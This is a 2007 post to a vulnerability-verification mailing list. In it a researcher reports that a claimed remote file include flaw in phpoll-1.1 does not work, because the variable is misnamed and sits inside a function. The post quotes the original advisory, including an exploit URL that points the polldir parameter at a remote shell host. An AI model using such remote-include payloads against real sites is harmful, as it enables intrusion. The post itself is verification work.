[VIM] false: phpoll-1.1 <= Remote File Include Vulnerability

str0ke str0ke at milw0rm.com
Fri Feb 2 09:51:42 EST 2007


Isn't vulnerable, the variable isn't correctly used on line 290
polldir is actually pollDir and is inside of a function.  Installed
for testing with it not being vulnerable.

/str0ke



-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
phpoll-1.1 <=  Remote File Include Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
URL:
http://fresh.t-systems-sfr.com/unix/src/privat2/phpoll-1.1.tgz
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
V.CODE: In : /phpoll.php  <<<<=====>>>>      Line :290

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Exploit:
http://www.victimes.com/[phpoll_path]/phpoll.php?polldir=http://sheLL?
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


More information about the VIM mailing list